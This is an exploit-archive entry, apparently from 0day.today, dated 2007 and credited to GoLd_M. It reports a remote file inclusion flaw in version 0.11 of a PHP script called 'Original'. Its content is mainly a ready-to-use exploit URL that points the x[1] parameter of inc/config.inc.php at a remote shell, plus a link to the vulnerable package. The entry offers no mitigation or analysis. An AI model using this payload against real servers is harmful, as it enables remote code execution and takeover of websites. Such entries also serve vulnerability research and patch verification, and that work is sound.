id: 1856
date: 05/09/2007
title: Original 0.11 config.inc.php x[1] Remote File Inclusion Vulnerability
author: GoLd_M
cves: 

=====================================================================
Original 0.11 config.inc.php x[1] Remote File Inclusion Vulnerability
=====================================================================



# Original Version 0.11(config.inc.php) Remote File Inclusion Vulnerability
# D.Script: http://xanatos.glo.org.mx/bi/original-0.11.tar.bz2
# Discovered by: GolD_M = [Mahmood_ali]
# Exploit:[Path]/inc/config.inc.php?x[1]=Shell



#  0day.today [2023-03-27]  #